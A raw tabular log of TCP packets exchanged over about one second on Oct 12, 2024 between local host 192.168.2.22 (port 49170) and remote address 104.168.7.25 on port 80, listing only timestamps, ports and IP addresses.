Oct 12, 2024 16:39:57.709088087 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709105968 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709115028 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709115028 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709134102 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709152937 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709162951 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709177971 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709202051 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709208965 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709216118 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709218979 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709235907 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709238052 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709250927 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709258080 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709268093 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709283113 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709283113 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709290981 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709300995 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709306955 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709316969 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709321022 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709331989 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709342003 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709347010 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709355116 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709362984 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709374905 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709381104 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.709383011 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709403992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709424019 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.709469080 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.764190912 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.764267921 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.764283895 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.764302969 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.764317989 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.764322996 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.764341116 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.764345884 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.764358997 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.764365911 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.764368057 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.764389038 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.764403105 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796232939 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796247959 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796262980 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796325922 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796334028 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796346903 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796363115 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796377897 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796394110 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796407938 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796411991 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796411991 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796425104 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796442986 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796447992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796463966 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796468973 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796483040 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796495914 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796504974 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796521902 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796541929 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796544075 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796562910 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796565056 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796581030 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796591997 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796610117 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796619892 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796639919 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796641111 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796659946 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796672106 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796679020 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796693087 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796693087 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796700954 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796716928 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796720982 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796725988 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796746969 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796749115 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796749115 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796761990 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796765089 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796781063 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796797037 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796799898 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796824932 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796827078 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796834946 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796854019 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796869993 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796885014 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796900034 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796905041 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796916008 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796926022 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796937943 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796952963 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796960115 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796967983 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.796986103 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.796994925 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797003031 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797018051 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797044992 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797048092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797055960 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797066927 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797080040 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797086000 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797105074 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797116041 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797121048 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797132015 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797152996 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797164917 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797200918 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797216892 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797230959 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797250032 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797251940 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797261000 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797278881 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797281981 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797295094 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797300100 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797316074 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797333956 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797352076 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797353029 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797362089 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797373056 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797380924 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797398090 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797410011 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797415018 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797429085 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797439098 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797458887 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797460079 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797477961 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797483921 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797503948 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797509909 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797528982 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797528982 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797555923 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797557116 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797573090 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797578096 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797599077 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797600031 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797620058 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797624111 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797645092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797645092 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797662973 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797667980 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797689915 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797696114 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797713041 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797723055 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797743082 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797743082 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797763109 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797769070 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797785044 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797800064 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797806978 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797811985 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797830105 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797852039 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797854900 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797880888 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797897100 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797913074 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797928095 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797933102 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797936916 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797950983 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797954082 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797972918 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797975063 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.797995090 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.797995090 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798019886 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798022985 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798033953 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798048973 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798065901 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798069000 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798095942 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798096895 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798118114 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798118114 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798144102 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798161030 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798177004 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798192978 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798194885 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798204899 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798214912 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798228025 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798242092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798245907 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798255920 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798264980 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798279047 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798294067 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798309088 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798315048 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798320055 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798336029 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798343897 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798357964 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798361063 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798377991 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798379898 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798399925 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798401117 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798407078 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798418999 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798434973 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798441887 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798443079 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798468113 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798471928 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798482895 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798490047 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798505068 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798521042 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798536062 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798541069 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798552990 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798562050 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798574924 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798582077 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798583031 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798603058 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798603058 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798618078 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798621893 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798639059 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798640966 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798661947 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798662901 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798686028 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798702955 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798703909 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798703909 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.798736095 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.798784018 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.853878975 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.853952885 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.853996992 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.854005098 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.854034901 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.854070902 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.854079962 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.854087114 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.854119062 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.854156017 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.854180098 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.854218960 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.892966986 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893012047 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893079042 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893106937 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893106937 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893125057 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893186092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893192053 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893244982 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893275976 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893290043 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893305063 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893331051 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893345118 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893374920 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893392086 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893428087 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893435001 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893493891 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893496037 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893554926 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893557072 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893591881 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893610001 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893610954 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893629074 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893630981 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893646002 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893650055 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893663883 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893668890 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893691063 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893697977 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893712044 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893717051 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893737078 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893744946 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893760920 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893770933 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893783092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893789053 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893805027 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893824100 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893837929 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893842936 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893846989 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893862009 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893862963 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893882036 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893882036 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893898964 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893918037 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893923998 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893935919 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893938065 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893958092 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893968105 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.893975973 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.893984079 CEST	49170	80	192.168.2.22	104.168.7.25
